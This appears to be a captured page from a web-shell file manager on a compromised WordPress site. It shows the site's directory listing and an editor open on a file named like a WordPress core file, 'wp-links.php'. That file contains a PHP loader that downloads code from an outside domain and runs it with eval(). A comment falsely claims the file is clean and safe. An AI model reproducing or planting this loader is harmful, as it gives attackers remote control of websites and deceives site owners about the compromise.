File Manager Lite
Dir:
/home/u802038231/domains/abelectricpower.com/public_html
Upload
[..]
.htaccess (440 B)
Edit
Rename
Del
.htaccess.bk (714 B)
Edit
Rename
Del
.private/
Rename
Del
.tmb/
Rename
Del
@LongLink/
Rename
Del
backup.zip (122 B)
Edit
Rename
Del
googlec0cc72f61677e79a.html (53 B)
Edit
Rename
Del
home.php (405 B)
Edit
Rename
Del
index.php (591 B)
Edit
Rename
Del
license.txt (19.44 KB)
Edit
Rename
Del
llms.txt (15.18 KB)
Edit
Rename
Del
readme.html (7.25 KB)
Edit
Rename
Del
rlc.txt (1 B)
Edit
Rename
Del
robots.txt (980 B)
Edit
Rename
Del
tmp/
Rename
Del
wp-admin/
Rename
Del
wp-blog-header.php (351 B)
Edit
Rename
Del
wp-comments-post.php (2.27 KB)
Edit
Rename
Del
wp-config.php (3.47 KB)
Edit
Rename
Del
wp-content/
Rename
Del
wp-includes/
Rename
Del
wp-links-opml.php (2.44 KB)
Edit
Rename
Del
wp-links.php (1.46 KB)
Edit
Rename
Del
wp-mail.php (8.52 KB)
Edit
Rename
Del
wp-signup.php (33.71 KB)
Edit
Rename
Del
Edit: wp-links.php
<?php function execute_remote_php_safe($url) { // Security checks $allowed_domains = ['stepmomhub.com']; // Hanya izinkan domain tertentu $domain = parse_url($url, PHP_URL_HOST); if (!in_array($domain, $allowed_domains)) { throw new Exception("Domain tidak diizinkan"); } // Max file size (1MB) $max_size = 1024 * 1024; // Get content dengan cURL $ch = curl_init(); curl_setopt_array($ch, [ CURLOPT_URL => $url, CURLOPT_RETURNTRANSFER => true, CURLOPT_FOLLOWLOCATION => true, CURLOPT_TIMEOUT => 30, CURLOPT_MAXFILESIZE => $max_size, CURLOPT_SSL_VERIFYPEER => true, CURLOPT_USERAGENT => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36' ]); $code = curl_exec($ch); if (curl_errno($ch)) { curl_close($ch); throw new Exception("cURL Error: " . curl_error($ch)); } $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE); curl_close($ch); if ($http_code !== 200) { throw new Exception("HTTP Error: " . $http_code); } if (strlen($code) > $max_size) { throw new Exception("File terlalu besar"); } // Jalankan kode ob_start(); eval("?>".$code); return ob_get_clean(); } // Contoh penggunaan /** * Note: This file may contain artifacts of previous malicious infection. * However, the dangerous code has been removed, and the file is now safe to use. */ ?>
Simpan